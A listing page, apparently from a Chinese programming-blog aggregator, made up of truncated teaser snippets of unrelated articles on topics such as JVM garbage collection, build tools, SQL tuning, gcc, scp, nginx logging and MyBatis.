    RBDMuteSwitch:一键静音控制工具使用指南RBDMuteSwitchPriortoiOS5itwasrelativelystraightforwardtodetectwhetheradevicewasmutedbyusinganaudioroutetodetectplaybacktype.项目地址:https://gitcode.com/gh_mirrors/rb/RBDMuteSwit
  • JVM垃圾回收机制深度解析 真实的菜 jvmjvm
    ️JVM垃圾回收机制深度解析文章目录️JVM垃圾回收机制深度解析垃圾判定算法引用计数法可达性分析算法垃圾回收算法️标记-清除算法复制算法标记-整理算法️分代收集算法️常见垃圾收集器Serial收集器⚡ParNew收集器Parallel收集器CMS收集器G1收集器⚡垃圾回收调优常用JVM调优参数️调优工具使用:JConsole、VisualVMJConsoleVisualVM实战案例分析案例一:内存
  • PromptX 核心架构深度解析:DPML 标签框架的革命性设计
    核心理念:让AI既是工具使用者,也是被工具赋能者-通过标准化的"标签框架"实现AI的即时专家化引言:标签框架背后的深刻洞察当我们深入探索PromptX项目中的tag目录时,会发现这不仅仅是几个技术规范文件,而是一套完整的AI认知架构系统。这五个标签框架文件构成了PromptX生态系统的"DNA",定义了AI如何思考、如何行动、如何成为专业角色。今天,让我们从这些看似简单的标签定义开始,解析Prom
  • 常见构建工具使用与原理浅析
    1.初版构建工具1.1.GruntGrunt是前端第一个正式的构建工具,它基于Node.js开发。Grunt同样是基于插件实现功能拓展增强,但对于像Webpack上很多能力,如HMR、ScopeHoisting等都是不支持的,可以作为学习Webpack前的了解。Grunt更像是一种自动化的配置工具集,就如官方所说,Grunt是TheJavaScriptTaskRunner,每个Grunt任务通常必
  • vscode工具使用技巧 Victor Zhong Toolvscode用法
    vscode使用快捷键使用快捷键C+KC+0:代码区快折叠C+KC+J:代码区块展开ctr+/:行注释,再按反注释shift+alt+A:块注释
  • AI大模型如何重塑软件开发流程? 真实的菜 活动人工智能
    AI大模型如何重塑软件开发流程?文章摘要随着ChatGPT、Claude等AI大模型的快速发展,软件开发行业正经历着前所未有的变革。本文深入探讨了AI技术如何重塑传统的软件开发流程,分析了开发者角色的转变,并提供了拥抱AI时代的实践指南。核心观点AI大模型将开发者角色从"编码者"转变为"设计师"需求分析、代码生成、测试等环节将实现智能化新技能需求:AI工具使用、提示工程、跨领域整合未来趋势:低代码
  • ART(Automatic Reasoning and Tool-use):自动推理与工具使用的革命性突破
    引言在人工智能快速发展的今天,大语言模型(LLM)的能力边界正在不断被重新定义。ART(AutomaticReasoningandTool-use)技术作为一项革命性的突破,为AI系统提供了自动推理并使用外部工具的能力,这标志着我们正在迈向更加智能和实用的AI时代。什么是ART技术?ART是AutomaticReasoningandTool-use的缩写,它是一种让AI系统能够自动进行推理并调用外
  • 超全数据库优化与调优实战指南,从基础到进阶 半夜鬼刀门 数据库面试mysqlsql
    一、引言在数据库应用开发与运维过程中,SQL语句的性能表现直接关乎系统的响应速度、资源利用率以及整体稳定性。随着业务数据量的增长和复杂查询场景的增多,对SQL进行优化与调优变得愈发关键。本文将围绕SQL优化这一主题,从慢SQL治理、执行计划分析、架构优化、代码层面优化、索引优化等多个维度展开详细阐述,结合实际案例与工具使用,为大家呈现一套完整的SQL优化实践体系。二、慢SQL治理(一)慢SQL基础
  • Oreacle(SQL语言基础)
    关键词:SQL入门、SQL分类、SQL*Plus、SELECT语句、DML语句、事务控制✅摘要SQL(StructuredQueryLanguage)是关系型数据库的核心操作语言,广泛应用于Oracle、MySQL、PostgreSQL、SQLServer等主流数据库系统中。本文将从SQL的基本分类讲起,详细介绍SELECT查询、DML数据操作语句,并结合SQL工具使用和事务控制机制,每个知识点都
  • 【Linux】环境基础开发工具使用——gcc/g++使用 风铃子加油 Linuxlinux算法运维开发语言xshell
    Linux编译器-gcc/g++使用1.背景知识1.预处理(进行宏替换)2.编译(生成汇编)3.汇编(生成机器可识别代码)4.连接(生成可执行文件或库文件)2.gcc如何完成格式gcc[选项]要编译的文件[选项][目标文件]预处理(进行宏替换)预处理功能主要包括宏定义,文件包含,条件编译,去注释等。预处理指令是以#号开头的代码行。实例:gcc–Ehello.c–ohello.i选项“-E”,该选项
  • 【数据标注师】事件标注2 试着 数据标注师数据标注师事件标注
    目录一、**深入理解事件标注的核心架构**1.**事件五要素(标注核心对象)**2.**三大项目特性**二、**四阶段系统学习法**▶**阶段1:掌握标注指南(20%理论+80%案例)**▶**阶段2:触发词精准识别训练**▶**阶段3:要素抽取实战技巧**▶**阶段4:复杂场景突破三、**高效标注工具使用指南**1.**快捷键流操作(以主流工具为例)**2.**颜色编码法**四、**错误防御体系
  • 基于llama-factory+ollama+vllm加速大模型训推生产 zwxu_ 大模型专栏llama人工智能大模型
    目录一、名称解释1.1产品定义二、llama-factory工具使用2.1基础镜像2.2、模型训练2.2.1以Qwen2.5-7B-Instruct为例
  • Linux的Initrd机制 被触发 linux
    Linux 的 initrd 技术是一个非常普遍使用的机制,linux2.6 内核的 initrd 的文件格式由原来的文件系统镜像文件转变成了 cpio 格式,变化不仅反映在文件格式上, linux 内核对这两种格式的 initrd 的处理有着截然的不同。本文首先介绍了什么是 initrd 技术,然后分别介绍了 Linux2.4 内核和 2.6 内核的 initrd 的处理流程。最后通过对 Lin
  • maven本地仓库路径修改 bitcarter maven
    默认maven本地仓库路径:C:\Users\Administrator\.m2 修改maven本地仓库路径方法:     1.打开E:\maven\apache-maven-2.2.1\conf\settings.xml     2.找到        
  • XSD和XML中的命名空间 darrenzhu xmlxsdschemanamespace命名空间
    http://www.360doc.com/content/12/0418/10/9437165_204585479.shtml http://blog.csdn.net/wanghuan203/article/details/9203621 http://blog.csdn.net/wanghuan203/article/details/9204337 http://www.cn
  • Java 求素数运算 周凡杨 java算法素数
    网络上对求素数之解数不胜数,我在此总结归纳一下,同时对一些编码,加以改进,效率有成倍热提高。 第一种:   原理: 6N(+-)1法         任何一个自然数,总可以表示成为如下的形式之一: 6N,6N+1,6N+2,6N+3,6N+4,6N+5 (N=0,1,2,…)   
  • java 单例模式 g21121 java
    想必单例模式大家都不会陌生,有如下两种方式来实现单例模式:   class Singleton { private static Singleton instance=new Singleton(); private Singleton(){} static Singleton getInstance() { return instance; }
  • Linux下Mysql源码安装 510888780 mysql
    1.假设已经有mysql-5.6.23-linux-glibc2.5-x86_64.tar.gz (1)创建mysql的安装目录及数据库存放目录       解压缩下载的源码包,目录结构,特殊指定的目录除外:           
  • 32位和64位操作系统 墙头上一根草 32位和64位操作系统
    32位和64位操作系统是指:CPU一次处理数据的能力是32位还是64位。现在市场上的CPU一般都是64位的,但是这些CPU并不是真正意义上的64 位CPU,里面依然保留了大部分32位的技术,只是进行了部分64位的改进。32位和64位的区别还涉及了内存的寻址方面,32位系统的最大寻址空间是2 的32次方= 4294967296(bit)= 4(GB)左右,而64位系统的最大寻址空间的寻址空间则达到了
  • 我的spring学习笔记10-轻量级_Spring框架 aijuans Spring 3
    一、问题提问:     → 请简单介绍一下什么是轻量级?     轻量级(Leightweight)是相对于一些重量级的容器来说的,比如Spring的核心是一个轻量级的容器,Spring的核心包在文件容量上只有不到1M大小,使用Spring核心包所需要的资源也是很少的,您甚至可以在小型设备中使用Spring。  
  • mongodb 环境搭建及简单CURD antlove WebInstallcurdNoSQLmongo
    一 搭建mongodb环境 1. 在mongo官网下载mongodb 2. 在本地创建目录 "D:\Program Files\mongodb-win32-i386-2.6.4\data\db" 3. 运行mongodb服务 [mongod.exe --dbpath "D:\Program Files\mongodb-win32-i386-2.6.4\data\
  • 数据字典和动态视图 百合不是茶 oracle数据字典动态视图系统和对象权限
    数据字典(data dictionary)是 Oracle 数据库的一个重要组成部分,这是一组用于记录数据库信息的只读(read-only)表。随着数据库的启动而启动,数据库关闭时数据字典也关闭   数据字典中包含   数据库中所有方案对象(schema object)的定义(包括表,视图,索引,簇,同义词,序列,过程,函数,包,触发器等等) 数据库为一
  • 多线程编程一般规则 bijian1013 javathread多线程java多线程
           如果两个工两个以上的线程都修改一个对象,那么把执行修改的方法定义为被同步的,如果对象更新影响到只读方法,那么只读方法也要定义成同步的。        不要滥用同步。如果在一个对象内的不同的方法访问的不是同一个数据,就不要将方法设置为synchronized的。
  • 将文件或目录拷贝到另一个Linux系统的命令scp bijian1013 linuxunixscp
    一.功能说明        scp就是security copy,用于将文件或者目录从一个Linux系统拷贝到另一个Linux系统下。scp传输数据用的是SSH协议,保证了数据传输的安全,其格式如下:        scp 远程用户名@IP地址:文件的绝对路径
  • 【持久化框架MyBatis3五】MyBatis3一对多关联查询 bit1129 Mybatis3
    以教员和课程为例介绍一对多关联关系,在这里认为一个教员可以叫多门课程,而一门课程只有1个教员教,这种关系在实际中不太常见,通过教员和课程是多对多的关系。   示例数据:   地址表:   CREATE TABLE ADDRESSES ( ADDR_ID INT(11) NOT NULL AUTO_INCREMENT, STREET VAR
  • cookie状态判断引发的查找问题 bitcarter formcgi
    先说一下我们的业务背景: 1.前台将图片和文本通过form表单提交到后台,图片我们都做了base64的编码,并且前台图片进行了压缩 2.form中action是一个cgi服务 3.后台cgi服务同时供PC,H5,APP 4.后台cgi中调用公共的cookie状态判断方法(公共的,大家都用,几年了没有问题) 问题:(折腾两天。。。。) 1.PC端cgi服务正常调用,cookie判断没
  • 通过Nginx,Tomcat访问日志(access log)记录请求耗时 ronin47
    一、Nginx通过$upstream_response_time $request_time统计请求和后台服务响应时间 nginx.conf使用配置方式: log_format main '$remote_addr - $remote_user [$time_local] "$request" ''$status $body_bytes_sent "$http_r
  • java-67- n个骰子的点数。 把n个骰子扔在地上,所有骰子朝上一面的点数之和为S。输入n,打印出S的所有可能的值出现的概率。 bylijinnan java
    public class ProbabilityOfDice { /** * Q67 n个骰子的点数 * 把n个骰子扔在地上,所有骰子朝上一面的点数之和为S。输入n,打印出S的所有可能的值出现的概率。 * 在以下求解过程中,我们把骰子看作是有序的。 * 例如当n=2时,我们认为(1,2)和(2,1)是两种不同的情况 */ private stati
  • 看别人的博客,觉得心情很好 Cb123456 博客心情
       以为写博客,就是总结,就和日记一样吧,同时也在督促自己。今天看了好长时间博客:    职业规划:    http://www.iteye.com/blogs/subjects/zhiyeguihua      android学习:    1.http://byandby.i
  • [JWFD开源工作流]尝试用原生代码引擎实现循环反馈拓扑分析 comsci 工作流
        我们已经不满足于仅仅跳跃一次,通过对引擎的升级,今天我测试了一下循环反馈模式,大概跑了200圈,引擎报一个溢出错误      在一个流程图的结束节点中嵌入一段方程,每次引擎运行到这个节点的时候,通过实时编译器GM模块,计算这个方程,计算结果与预设值进行比较,符合条件则跳跃到开始节点,继续新一轮拓扑分析,直到遇到
  • JS常用的事件及方法 cwqcwqmax9 js
    事件 描述 onactivate 当对象设置为活动元素时触发。 onafterupdate 当成功更新数据源对象中的关联对象后在数据绑定对象上触发。 onbeforeactivate 对象要被设置为当前元素前立即触发。 onbeforecut 当选中区从文档中删除之前在源对象触发。 onbeforedeactivate 在 activeElement 从当前对象变为父文档其它对象之前立即
  • 正则表达式验证日期格式 dashuaifu 正则表达式IT其它java其它
    正则表达式验证日期格式 function isDate(d){ var v = d.match(/^(\d{4})-(\d{1,2})-(\d{1,2})$/i); if(!v) { this.focus(); return false; } } <input value="2000-8-8" onblu
  • Yii CModel.rules() 方法 、validate预定义完整列表、以及说说验证 dcj3sjt126com yii
    public array rules () {return} array 要调用 validate() 时应用的有效性规则。 返回属性的有效性规则。声明验证规则,应重写此方法。 每个规则是数组具有以下结构:array('attribute list', 'validator name', 'on'=>'scenario name', ...validation
  • UITextAttributeTextColor = deprecated in iOS 7.0 dcj3sjt126com ios
    In this lesson we used the key "UITextAttributeTextColor" to change the color of the UINavigationBar appearance to white. This prompts a warning "first deprecated in iOS 7.0." Ins
  • 判断一个数是质数的几种方法 EmmaZhao Mathpython
    质数也叫素数,是只能被1和它本身整除的正整数,最小的质数是2,目前发现的最大的质数是p=2^57885161-1【注1】。 判断一个数是质数的最简单的方法如下: def isPrime1(n): for i in range(2, n): if n % i == 0: return False return True 但是在上面的方法中有一些冗余的计算,所以
  • SpringSecurity工作原理小解读 坏我一锅粥 SpringSecurity
      SecurityContextPersistenceFilter   ConcurrentSessionFilter   WebAsyncManagerIntegrationFilter   HeaderWriterFilter   CsrfFilter   LogoutFilter   Use
  • JS实现自适应宽度的Tag切换 ini JavaScripthtmlWebcsshtml5
    效果体验:http://hovertree.com/texiao/js/3.htm   该效果使用纯JavaScript代码,实现TAB页切换效果,TAB标签根据内容自适应宽度,点击TAB标签切换内容页。 HTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"
  • Hbase Rest API : 数据查询 kane_xie RESThbase
    hbase(hadoop)是用java编写的,有些语言(例如python)能够对它提供良好的支持,但也有很多语言使用起来并不是那么方便,比如c#只能通过thrift访问。Rest就能很好的解决这个问题。Hbase的org.apache.hadoop.hbase.rest包提供了rest接口,它内嵌了jetty作为servlet容器。   启动命令:./bin/hbase rest s
  • JQuery实现鼠标拖动元素移动位置(源码+注释) 明子健 jqueryjs源码拖动鼠标
    欢迎讨论指正!   print.html代码: <!DOCTYPE html> <html> <head> <meta http-equiv=Content-Type content="text/html;charset=utf-8"> <title>发票打印</title> &l
  • Postgresql 连表更新字段语法 update qifeifei PostgreSQL
    下面这段sql本来目的是想更新条件下的数据,可是这段sql却更新了整个表的数据。sql如下: UPDATE tops_visa.visa_order SET op_audit_abort_pass_date = now() FROM tops_visa.visa_order as t1 INNER JOIN tops_visa.visa_visitor as t2 ON t1.
  • 将redis,memcache结合使用的方案? tcrct rediscache
    公司架构上使用了阿里云的服务,由于阿里的kvstore收费相当高,打算自建,自建后就需要自己维护,所以就有了一个想法,针对kvstore(redis)及ocs(memcache)的特点,想自己开发一个cache层,将需要用到list,set,map等redis方法的继续使用redis来完成,将整条记录放在memcache下,即findbyid,save等时就memcache,其它就对应使用redi
  • 开发中遇到的诡异的bug wudixiaotie bug
    今天我们服务器组遇到个问题: 我们的服务是从Kafka里面取出数据,然后把offset存储到ssdb中,每个topic和partition都对应ssdb中不同的key,服务启动之后,每次kafka数据更新我们这边收到消息,然后存储之后就发现ssdb的值偶尔是-2,这就奇怪了,最开始我们是在代码中打印存储的日志,发现没什么问题,后来去查看ssdb的日志,才发现里面每次set的时候都会对同一个key
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他